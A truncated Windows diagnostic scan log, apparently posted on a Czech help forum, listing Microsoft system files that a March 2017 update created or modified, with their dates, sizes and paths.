2017-03-14 18:36 - 2017-03-04 07:10 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 00300544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\regedit.exe
2017-03-14 18:36 - 2017-03-04 07:10 - 00259584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcuiu.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00570368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2017-03-14 18:36 - 2017-03-04 07:09 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-03-14 18:36 - 2017-03-04 07:08 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 02748928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 02643456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-03-14 18:36 - 2017-03-04 07:07 - 00545280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 06109184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 05380608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2017-03-14 18:36 - 2017-03-04 07:06 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidprov.dll
2017-03-14 18:36 - 2017-03-04 07:05 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00753152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imapi2fs.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll
2017-03-14 18:36 - 2017-03-04 07:04 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 02363904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 02109952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-03-14 18:36 - 2017-03-04 07:03 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxclu.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02740224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-03-14 18:36 - 2017-03-04 07:02 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01571840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2017-03-14 18:36 - 2017-03-04 07:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01154560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Pimstore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-03-14 18:36 - 2017-03-04 07:01 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00560640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserLanguagesCpl.dll
2017-03-14 18:36 - 2017-03-04 07:01 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 02996736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-03-14 18:36 - 2017-03-04 07:00 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 02003968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2017-03-14 18:36 - 2017-03-04 07:00 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-03-14 18:36 - 2017-03-04 06:59 - 00353280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2017-03-14 18:36 - 2017-03-04 06:59 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-03-14 18:36 - 2017-03-04 06:57 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 00449024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-03-14 18:36 - 2017-03-04 06:57 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-03-14 18:35 - 2017-03-04 08:57 - 00192352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00655200 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00590952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00378720 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00315232 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-03-14 18:35 - 2017-03-04 08:35 - 00086368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-03-14 18:35 - 2017-03-04 08:35 - 00038240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-03-14 18:35 - 2017-03-04 08:27 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-03-14 18:35 - 2017-03-04 08:26 - 00794416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-03-14 18:35 - 2017-03-04 08:25 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-03-14 18:35 - 2017-03-04 08:24 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-03-14 18:35 - 2017-03-04 08:24 - 00646688 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-03-14 18:35 - 2017-03-04 08:24 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2017-03-14 18:35 - 2017-03-04 08:24 - 00108384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-03-14 18:35 - 2017-03-04 08:23 - 02512304 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2017-03-14 18:35 - 2017-03-04 08:22 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-03-14 18:35 - 2017-03-04 08:22 - 02213760 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-03-14 18:35 - 2017-03-04 08:22 - 01354312 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-03-14 18:35 - 2017-03-04 08:22 - 01172984 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-03-14 18:35 - 2017-03-04 08:21 - 02255712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-03-14 18:35 - 2017-03-04 08:20 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2017-03-14 18:35 - 2017-03-04 08:20 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-03-14 18:35 - 2017-03-04 08:18 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-03-14 18:35 - 2017-03-04 08:18 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-03-14 18:35 - 2017-03-04 08:18 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\IPHLPAPI.DLL
2017-03-14 18:35 - 2017-03-04 08:18 - 00118624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-03-14 18:35 - 2017-03-04 08:17 - 00409952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2017-03-14 18:35 - 2017-03-04 08:15 - 01000280 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-03-14 18:35 - 2017-03-04 08:15 - 00404320 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2017-03-14 18:35 - 2017-03-04 08:15 - 00063328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2017-03-14 18:35 - 2017-03-04 08:13 - 00635456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-03-14 18:35 - 2017-03-04 08:11 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-03-14 18:35 - 2017-03-04 08:11 - 00266544 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2017-03-14 18:35 - 2017-03-04 08:10 - 02828384 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2017-03-14 18:35 - 2017-03-04 08:10 - 02189664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-03-14 18:35 - 2017-03-04 08:10 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 07220696 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 00681312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-03-14 18:35 - 2017-03-04 08:09 - 00635864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00578392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-03-14 18:35 - 2017-03-04 08:09 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-03-14 18:35 - 2017-03-04 08:09 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2017-03-14 18:35 - 2017-03-04 08:09 - 00178520 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-03-14 18:35 - 2017-03-04 08:08 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00450400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2017-03-14 18:35 - 2017-03-04 08:08 - 00342456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2017-03-14 18:35 - 2017-03-04 08:08 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-03-14 18:35 - 2017-03-04 08:07 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combas
Kdo je online
Uživatelé prohlížející si toto fórum: Google Adsense [Bot] a 7 hostů